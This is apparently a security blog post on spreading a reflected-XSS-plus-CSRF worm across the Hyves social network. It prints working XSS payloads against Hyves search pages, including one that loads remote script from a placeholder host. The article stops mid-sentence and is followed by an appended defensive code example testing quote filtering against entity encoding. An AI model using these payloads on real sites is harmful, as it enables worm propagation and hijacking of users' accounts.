Launching XSS CSRF Based Worms On Social Networks.

Published on: 1202050354
For those who didn't know it yet, XSS is just bad. But it can be far worse. Usually, if not always, many hold the firm belief that XSS worms need to be based on stored XSS rather than reflected XSS. This might hold some water, because a stored hole contributes to the worm's persistence. But it isn't necessary. In this article I want to explain why a stored XSS hole isn't mandatory, and how reflected XSS can show worm-like behaviour when combined with CSRF. CSRF is a great way of mixing up, or leveraging, the social engineering part. We as an attacker don't need to engineer every user into clicking on a link that looks quite murky. It is possible to let victims infect their own friends. This way, the social engineering is far more likely to succeed. CSRF helps us achieve that goal: to propagate a reflected XSS worm we only have to trick one person. The rest happens automatically.

Last week a reader named Bart Kerkvliet contacted me about an XSS hole he found in the online social network site called Hyves. Hyves is a very popular website in my country. They have millions of active users, including our national president. Bart told me about the XSS vulnerability, and that he had contacted Hyves to notify them about the issue. Hyves didn't respond adequately, so he tried again. After some time they decided to fix it. Bart then went back and tried again, and sure enough, they hadn't fixed it properly. It was still possible to inject Javascript into different search fields. Obviously, it wasn't fixed. Hyves also said that it wasn't that bad after all. They do filter for single and double quotes, so who cares, you can't do anything malicious, right? Wrong.

Bart supplied these vectors to test:

Direct link:
http://www.hyves.nl/index.php?l1=ut&l2=sr&l3=ti&searchterms=%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E

Or go to: http://www.hyves.nl/search/tips/
and supply: <script>alert(/XSS/);</script>

We can also submit remote Javascript:
"><script src=server.com/somejs.js></script>
It is possible to inject remote Javascript files. The issue with remote Javascript is that it becomes part of the full DOM of the page it was injected into. Thus it can do anything that stored Javascript can do, which makes reflected XSS a big issue. While there is some limitation on the persistence of the actual worm, we can infect as many users as we want. Theoretically it can grow as large as a stored worm with some luck. And this article does just that: we are going to use CSRF to trick users into infecting their own social network profile. Hyves has the unfortunate problem that it also uses cookie authentication that the browser can be set to remember. This helps us to fully automate the attack. Moreover, they make royal use of Ajax. Many actions on Hyves
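As an added example (not from the original post, and not Hyves' code), here is why the "we filter single and double quotes" argument fails: a hypothetical quote-stripping filter beside proper HTML entity encoding, both run over the two vectors quoted above. The results template, the filter and the encoder are constructed stand-ins; the search URL is the one given by Bart.

```javascript
// Added example, not Hyves' code: why filtering quotes does not stop reflected XSS.
// SEARCH_URL is the direct link quoted above; the filter and template are stand-ins.
const SEARCH_URL =
  "http://www.hyves.nl/index.php?l1=ut&l2=sr&l3=ti&searchterms=" +
  "%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E";
const REMOTE_VECTOR = '"><script src=server.com/somejs.js></script>';

// Recover the raw search term from the query string, as the server would.
function searchTermFromUrl(url) {
  return new URL(url).searchParams.get("searchterms");
}

// A quote-only filter of the kind the post describes (hypothetical).
function stripQuotes(s) {
  return s.replace(/['"]/g, "");
}

// Context-aware encoding for text placed inside an HTML element.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Stand-in for the results template that echoes the search term back.
function renderResults(term, encoder) {
  return "<p>Results for: " + encoder(term) + "</p>";
}

// Count script tags in the rendered markup; anything above zero means the
// user-supplied term broke out of the text context.
function injectedScriptTags(term, encoder) {
  const html = renderResults(term, encoder);
  return (html.match(/<script\b/gi) || []).length;
}

// Check a tester can run over a set of inputs and a candidate encoder:
// returns the inputs that still produce script tags after encoding.
function unsafeInputs(inputs, encoder) {
  return inputs.filter((t) => injectedScriptTags(t, encoder) > 0);
}

const VECTORS = [searchTermFromUrl(SEARCH_URL), REMOTE_VECTOR];
console.log("quote filter leaves unsafe:", unsafeInputs(VECTORS, stripQuotes));
console.log("entity encoding leaves unsafe:", unsafeInputs(VECTORS, escapeHtml));
```

Neither vector contains a quote that matters, so the quote filter passes both through intact, while entity encoding neutralises both because it encodes the angle brackets that actually open a tag.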